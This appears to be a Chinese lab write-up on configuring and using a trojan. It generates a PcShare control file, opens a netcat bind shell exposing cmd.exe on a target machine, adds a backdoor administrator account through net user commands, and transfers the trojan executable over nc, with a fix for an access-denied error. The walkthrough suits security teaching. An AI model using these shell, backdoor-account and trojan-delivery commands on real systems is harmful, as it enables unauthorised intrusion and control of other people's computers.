木马程序的配置和使用实验

  • 实验准备
  • 实验环境
  • 实验过程
    • 生成木马控制文件
    • 通过nc.exe 开启远程shell
    • 通过远程shell传输木马文件
  • 实验问题
    • 发生系统错误 5。 拒绝访问

实验准备

控制机A和被控制机都需要安装两个软件

实验环境

  1. 控制机A
  2. 目标主机B

IP:192.168.6.128

实验过程

生成木马控制文件

  1. 打开pcShare生成控制文件
    不建议使用80端口,80端口一般被web占用,或者被保护
    ip地址要控制在自己列表范围内(随意)

    点击生成,建议放在控制机A nc程序的同级目录下

通过nc.exe 开启远程shell

  1. 在目标主机(B)开启端口监听
    切换到nc.exe软件所在的目录

    开启端口监听
nc -L -d -e cmd.exe -p 8888


2. 控制机A连接目标主机并开启远程命令行shell
这个过程中目标主机B的提示符窗口不能关闭,保持时刻监听
切换到nc程序所在的目录,输入命令

nc 192.168.6.120 8888

在目标主机创建新用户

net user admin_test "pasword" /add

net localgroup administrators admin_test /add

net user

通过远程shell传输木马文件

参考linux nc 传输文件
端口号随意

nc -v -l -p 7777 >test.exe


新开一个命令提示符传输文件

传输成功

实验问题

发生系统错误 5。 拒绝访问

错误
发生系统错误 5。 拒绝访问
原因
权限不足,导致创建失败
解决方案之一

  1. 打开任务管理器
    右键任务栏 选择任务管理器

  2. 详细信息 > 菜单栏 > 文件 > 运行新任务

  3. 勾选以管理员身份运行并确认

  4. 打开命令提示符后继续 执行命令

木马程序的配置和使用实验相关推荐

  1. 实验一木马分析(隐藏分析)实验

    实验一木马分析(隐藏分析)实验 1.木马隐藏技术 1)程序隐藏 木马程序可以利用程序捆绑的方式,将自己和正常的exe 文件进行捆绑.当双击运行捆绑后的程序时,正常的exe 文件运行了.程序隐藏只能达到 ...

  2. 解决“由于应用程序的配置不正确,应用程序未能启动,重新安装应用程序可能会纠正这个问题”...

    [VS2005]解决"由于应用程序的配置不正确,应用程序未能启动,重新安装应用程序可能会纠正这个问题" 今天在准备发布用VS2005写的那个程序时,拷贝到我同事机器上,双击突然出现 ...

  3. 解决“由于应用程序的配置不正确,应用程序未能启动,重新安装应用程序可能会纠正这个问题”(转贴)...

    [VS2005]解决"由于应用程序的配置不正确,应用程序未能启动,重新安装应用程序可能会纠正这个问题" 今天在准备发布用VS2005写的那个程序时,拷贝到我同事机器上,双击突然出现 ...

  4. nc扫描端口-curl-手动查杀木马过程之生成木马程序病原体并自动运行

    实验环境 RHEL6 本节所讲内容: 22.1 使用nc扫描端口 22.2 curl 查看web服务器类型 22.3 手动查杀木马过程之生成木马程序病原体 22.4 手动查杀木马过程之让木马程序自动运 ...

  5. python编写木马攻击_Python编写简易木马程序

    Python编写简易木马程序 0x00 准备 文章内容仅供学习研究.切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录.截屏以及通信功能的简易木马.依然选用Sublime text2 + ...

  6. 用python做一个木马_Python编程简单的木马程序(转载于乌云中)

    Python编程简单的木马程序 light·2015/01/26 10:07 0x00准备好了 本文的内容仅用于研究和研究,不得用于非法目的! 这一次,我们使用Python编写了一个简单的木马,它具有 ...

  7. Linux下木马程序隐藏进程实战

    实验环境 本实验在6.x的操作系统上完成: [root@gaosh-1 ~]# cat /etc/redhat-release CentOS release 6.9 (Final) Rootkit概述 ...

  8. 通过木马程序rootkit隐蔽行踪-创建root用户都删除不了的木马文件

    1-1-1-通过木马程序rootkit隐蔽行踪 1-1-2-创建一个让root用户都删除不了的木马文件 实战1 :内容 : 1.通过rootkit提权 2.通过rootkit隐藏木马进程号 3.通过r ...

  9. 无节制流氓推广 2345旗下下载站正在传播木马程序

    近日,火绒工程师发现2345旗下"多特下载站"的下载器(高速下载)正在实施传播木马程序的恶意行为.用户下载运行该下载器后,会立即被静默植入一款名为"commander&q ...

最新文章

  1. Asp.net无刷新调用后台实体类数据并以Json格式返回
  2. C++ 接口(抽象类)
  3. GitHub被中国人霸榜!国外开发者不开心了
  4. centos mysql 启动_MYSQL在centos上首次启动
  5. hive 常用UDF
  6. 开源 TiDB Operator 让 TiDB 成为真正的 Cloud-Native 数据库
  7. 富勒wms系统里的定时器id_「案例」全面升级的康缘药业物流系统
  8. 深入浅出SCSI子系统(六)SCSI 磁盘驱动
  9. 中兴盒子B860A-免拆机-线刷-第三方刷机固件及教程
  10. Vue.2Vue.3项目引入Element-UI教程踩坑
  11. uniapp调用芯烨xprinter打印机安卓sdk
  12. Java中Scanner的进阶---求和与求平均数
  13. Unity3D学习日记2
  14. 基于EEG信号与面部表情的连续情绪识别
  15. 解决RuntimeError: cuDNN error: CUDNN_STATUS_EXECUTION_FAILED 踩过的坑(配置环境:linux+anaconda3+pytorch ...)
  16. 史上最简单的 MySQL 教程(十四)「列属性 之 主键」
  17. 【NOI OJ】18 Tomorrow never knows?(未知的明天)
  18. 2020-11-23 PTA算法_贪心算法部分习题及代码
  19. 黑客攻防从入门到精通(一)
  20. windows远程连接redis

热门文章

  1. bootstrap-table的使用(3)--自定义搜索功能,数据库查询一个时间段内的内容并显示为例
  2. Staubli HCB05.7202/IC/JS3
  3. mongoTemplate时间范围查询
  4. Shell - rm
  5. 数据库 表设计 MySQL
  6. GitHub上有个高仿微信的开源项目,超厉害的!
  7. 头歌--Java入门 - Java初体验
  8. Java入门 - 数组进阶
  9. 如何画出漂亮的决策树?
  10. MyBatis3中CDATA的使用